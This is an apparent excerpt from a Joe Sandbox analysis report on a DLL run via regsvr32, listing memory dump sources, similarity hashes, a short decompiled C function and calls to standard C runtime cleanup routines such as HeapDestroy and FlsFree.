                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.919820408.000007FEF74F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF74F0000, based on PE: true
                                                                    • Associated: 00000005.00000002.919817428.000007FEF74F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000005.00000002.919837980.000007FEF7512000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000005.00000002.919844833.000007FEF751B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000005.00000002.919848379.000007FEF751F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7fef74f0000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer_initterm_e
                                                                    • String ID: Y
                                                                    • API String ID: 1618838664-1754117475
                                                                    • Opcode ID: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                                    • Instruction ID: 46fc2e21544c3fab56011d7981ca152787d70107ebc7354b2b958e2dc2ae2403
                                                                    • Opcode Fuzzy Hash: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                                    • Instruction Fuzzy Hash: E4E0C925E2C042DAF6A2AB20E8407F923E1BB94346F800531F14D474B5DB7DF904CB08
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 58%
                                                                    			E000007FE7FEF74F4399(long long __rax, long long _a48, intOrPtr _a80, intOrPtr _a88, void* _a120) {
                                                                    
                                                                    				_a48 = __rax;
                                                                    				if (_a48 == 0) goto 0xf74f43ad;
                                                                    				goto 0xf74f43f5;
                                                                    				if (_a88 != 0) goto 0xf74f43ce;
                                                                    				if (_a120 == 0) goto 0xf74f43c7;
                                                                    				 *_a120 = 0xc;
                                                                    				goto 0xf74f43f5;
                                                                    				if (E000007FE7FEF74FABB0(_a48, _a80) != 0) goto 0xf74f43f3;
                                                                    				if (_a120 == 0) goto 0xf74f43ef;
                                                                    				 *_a120 = 0xc;
                                                                    				goto 0xf74f43f5;
                                                                    				goto 0xf74f4377;
                                                                    				return 0;
                                                                    			}



                                                                    0x7fef74f4399
                                                                    0x7fef74f43a4
                                                                    0x7fef74f43ab
                                                                    0x7fef74f43b2
                                                                    0x7fef74f43ba
                                                                    0x7fef74f43c1
                                                                    0x7fef74f43cc
                                                                    0x7fef74f43da
                                                                    0x7fef74f43e2
                                                                    0x7fef74f43e9
                                                                    0x7fef74f43f1
                                                                    0x7fef74f43f3
                                                                    0x7fef74f43f9

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.919820408.000007FEF74F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF74F0000, based on PE: true
                                                                    • Associated: 00000005.00000002.919817428.000007FEF74F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000005.00000002.919837980.000007FEF7512000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000005.00000002.919844833.000007FEF751B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000005.00000002.919848379.000007FEF751F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7fef74f0000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                                    • Instruction ID: 67b0175ca48f45daf5b42bc593fb4f951043e705391ce4620868f5216f11e614
                                                                    • Opcode Fuzzy Hash: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                                    • Instruction Fuzzy Hash: 2101AE26A2CA41C7F6A48A19E4447AAA7E0F384795F100131FA8D47AB8DF7CE484CA00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _ioterm.LIBCMTD ref: 000007FEF74F3437
                                                                      • Part of subcall function 000007FEF74F7D00: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF74F343C), ref: 000007FEF74F7D93
                                                                      • Part of subcall function 000007FEF74F3E00: FlsFree.KERNEL32 ref: 000007FEF74F3E13
                                                                      • Part of subcall function 000007FEF74F3E00: _mtdeletelocks.LIBCMTD ref: 000007FEF74F3E23
                                                                      • Part of subcall function 000007FEF74F88D0: HeapDestroy.KERNELBASE ref: 000007FEF74F88DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.919820408.000007FEF74F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF74F0000, based on PE: true
                                                                    • Associated: 00000005.00000002.919817428.000007FEF74F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000005.00000002.919837980.000007FEF7512000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000005.00000002.919844833.000007FEF751B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000005.00000002.919848379.000007FEF751F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7fef74f0000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalDeleteDestroyFreeHeapSection_ioterm_mtdeletelocks
                                                                    • String ID:
                                                                    • API String ID: 1508997487-0
                                                                    • Opcode ID: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                                    • Instruction ID: 5e077c13179ed4a5ae1687737eba0226ba36b527ce4b6aecb72ea1d7554283b6
                                                                    • Opcode Fuzzy Hash: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                                    • Instruction Fuzzy Hash: 01E0E2A4E2C0078AF6C1636098023F915C55B44383F901038B00E8B2F6EABDA8008262
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%